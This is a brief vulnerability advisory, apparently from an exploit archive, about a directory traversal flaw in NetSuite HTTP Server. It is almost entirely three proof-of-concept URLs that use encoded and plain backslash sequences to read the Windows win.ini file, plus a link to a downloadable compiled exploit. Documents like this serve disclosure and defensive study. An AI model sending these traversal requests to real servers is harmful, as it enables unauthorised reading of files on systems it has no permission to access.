NetSuite HTTP Server Directory Traversal Vulnerability

NetSuite HTTP Server Directory Traversal Vulnerability

The following proof of concept has been provided:

http://www.example.com/%5c..%5c..%5c..%5cwindows%5cwin.ini
http://www.example.com/%5c..%5c..%5c..%5cwindows%5cwin%2eini
http://www.example.com/\..\..\..\windows\win.ini

A compiled exploit can be downloaded at:
http://members.lycos.co.uk/r34ct/main/Netsuite_expl/